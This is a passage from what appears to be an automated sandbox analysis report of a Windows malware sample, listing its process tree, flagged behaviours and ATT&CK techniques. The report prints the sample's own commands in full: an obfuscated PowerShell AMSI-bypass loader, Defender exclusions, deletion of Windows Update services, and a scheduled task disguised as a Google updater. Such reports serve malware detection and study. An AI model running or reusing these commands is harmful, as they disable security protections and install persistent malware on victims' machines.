'+[Char](102)+''+[Char](102)+''+'e'+'r')));$gifkQTmckc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GpZabUyBODTkoBeoN,$sxZoNIXqazoJNGqdvqMBkv).Invoke($cpLXoFEcHsvSGBtKu,[uint32]8,4,[ref]$gifkQTmckc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$cpLXoFEcHsvSGBtKu,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GpZabUyBODTkoBeoN,$sxZoNIXqazoJNGqdvqMBkv).Invoke($cpLXoFEcHsvSGBtKu,[uint32]8,0x20,[ref]$gifkQTmckc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+'d'+''+'i'+'a'+'l'+''+'e'+''+[Char](114)+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4360
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IZvLNQxByUyB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rTqGxIQPGJiKza,[Parameter(Position=1)][Type]$oPLoUAlLzn)$KLkqgjJOoHS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'Del'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c,'+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'A'+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$KLkqgjJOoHS.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+'c'+'i'+''+[Char](97)+'lNa'+'m'+''+[Char](101)+','+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'bl'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$rTqGxIQPGJiKza).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+'na'+'g'+''+'e'+''+[Char](100)+'');$KLkqgjJOoHS.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+'wS'+[Char](108)+''+'o'+''+[Char](116)+','+'V'+'i'+[Char](114)+'t'+[Char](117)+'a'+'l'+'',$oPLoUAlLzn,$rTqGxIQPGJiKza).SetImplementationFlags('R'+'u'+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $KLkqgjJOoHS.CreateType();}$ODamPajeTXNoZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+'e'+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+'t.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+'2'+'.'+[Char](85)+'ns'+[Char](97)+''+[Char](102)+'e'+[Char](79)+''+[Char](68)+''+[Char](97)+'m'+[Char](80)+''+'a'+'j'+[Char](101)+'TX'+'N'+''+'o'+''+'Z'+'');$eYzAXlwrZvCzLh=$ODamPajeTXNoZ.GetMethod(''+[Char](101)+''+[Char](89)+'zAX'+[Char](108)+''+[Char](119)+''+'r'+''+[Char](90)+''+[Char](118)+''+[Char](67)+''+'z'+''+[Char](76)+''+[Char](104)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic,'+[Char](83)+'ta'+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mhzluDsQCHqiknrQiXi=IZvLNQxByUyB @([String])([IntPtr]);$udDXqZGQPGcUpfxUGpWcTl=IZvLNQxByUyB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KqkHQKtoaef=$ODamPajeTXNoZ.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.'+'d'+'ll')));$ZsxAtKDLMLJCmX=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$KqkHQKtoaef,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$JmXFapyPAftBXmvZG=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$KqkHQKtoaef,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+'o'+'t'+''+[Char](101)+''+'c'+'t')));$VpvLgyC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZsxAtKDLMLJCmX,$mhzluDsQCHqiknrQiXi).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$DJPwMyEbeadCTvbgs=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$VpvLgyC,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$KnRgBJfvOH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JmXFapyPAftBXmvZG,$udDXqZGQPGcUpfxUGpWcTl).Invoke($DJPwMyEbeadCTvbgs,[uint32]8,4,[ref]$KnRgBJfvOH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DJPwMyEbeadCTvbgs,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JmXFapyPAftBXmvZG,$udDXqZGQPGcUpfxUGpWcTl).Invoke($DJPwMyEbeadCTvbgs,[uint32]8,0x20,[ref]$KnRgBJfvOH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'rst'+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1800

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1412
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2824

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
- Modifies Internet Explorer settings
PID:1624

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1752

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1968

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2480

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3148
- C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4616
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4628
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3652
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4656
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2948
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3756
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3200
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:5000
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4352
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4200
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5044
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4276
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:5032
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:4608
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:2600
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.0.1328874663\652812049" -parentBuildID 20221007134813 -prefsHandle 1640 -prefMapHandle 1628 -prefsLen 20888 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f3f2cd-0156-46eb-be80-2dac44842e46} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 1732 25a1fc1a558 gpu
      4⤵
      PID:4744
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.1.642940632\1519065521" -parentBuildID 20221007134813 -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 20969 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dee773ce-4d48-4a32-b3c9-4f37dfe9b0b9} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 2088 25a1e7fa558 socket
      4⤵
      Checks processor information in registry
      PID:164
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.2.1440049793\688447532" -childID 1 -isForBrowser -prefsHandle 2696 -prefMapHandle 2712 -prefsLen 21052 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {16aa0724-52f1-4eeb-89e9-56b0b7f1899f} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 2892 25a226ed258 tab
      4⤵
      PID:4568
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.4.1988170570\1960732705" -childID 3 -isForBrowser -prefsHandle 3656 -prefMapHandle 3448 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5043c43-ebd3-4ede-846d-f96685dbf03c} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 3664 25a2380a158 tab
      4⤵
      PID:1796
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.3.1086498294\846068342" -childID 2 -isForBrowser -prefsHandle 3456 -prefMapHandle 3452 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5498bf3b-7ec2-49e3-9aaa-7ea64de0fc41} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 3464 25a229deb58 tab
      4⤵
      PID:4864
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.5.1156688670\1610931462" -childID 4 -isForBrowser -prefsHandle 4768 -prefMapHandle 4744 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1233b40-70e4-4cb4-8784-82510402ccdb} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4788 25a24838658 tab
      4⤵
      PID:3940
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.7.1629581759\1693239971" -childID 6 -isForBrowser -prefsHandle 5084 -prefMapHandle 5088 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb561192-fca7-4587-a109-1756deb4196b} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4984 25a24ebb558 tab
      4⤵
      PID:2560
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.6.598857025\236853237" -childID 5 -isForBrowser -prefsHandle 4892 -prefMapHandle 4896 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eef8acad-4d3d-46cb-a2ec-22f587303a41} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4808 25a24eb8258 tab
      4⤵
      PID:4000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3660

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2840

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2488

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2460

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4604
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4604 -s 788
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:1208

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4040
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4040 -s 856
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:1136
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4040 -s 836
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:4756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3336

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5032

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:3912
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3912 -s 412
  2⤵
  - Program crash
  PID:4716
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3912 -s 460
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:1456

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4652
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4652 -s 404
  2⤵
  - Program crash
  PID:4876

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:4624

C:\Windows\System32\SystemSettingsBroker.exe
C:\Windows\System32\SystemSettingsBroker.exe -Embedding
1⤵
PID:4444

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s SstpSvc
1⤵
PID:3516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s RmSvc
1⤵
PID:3916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3640

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
- Drops file in Windows directory
PID:5048

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s RasMan
1⤵
PID:4100

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2120
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2120 -s 336
  2⤵
  - Program crash
  PID:3108

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1824
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1824 -s 360
  2⤵
  - Program crash
  PID:4520
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1824 -s 644
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:320

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in Windows directory
PID:4872
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4872 -s 696
  2⤵
  - Program crash
  PID:4012

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3032

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2096

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1988

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in Windows directory
PID:4192
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4192 -s 692
  2⤵
  - Program crash
  PID:4160
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4192 -s 668
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:3748

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20F9.tmp.csv

Filesize
30KB

MD5
ed311df6c43285f8f165b89293bd96dc

SHA1
39cd87d13d6bff2155083d834fb1670ba1e9dfcc

SHA256
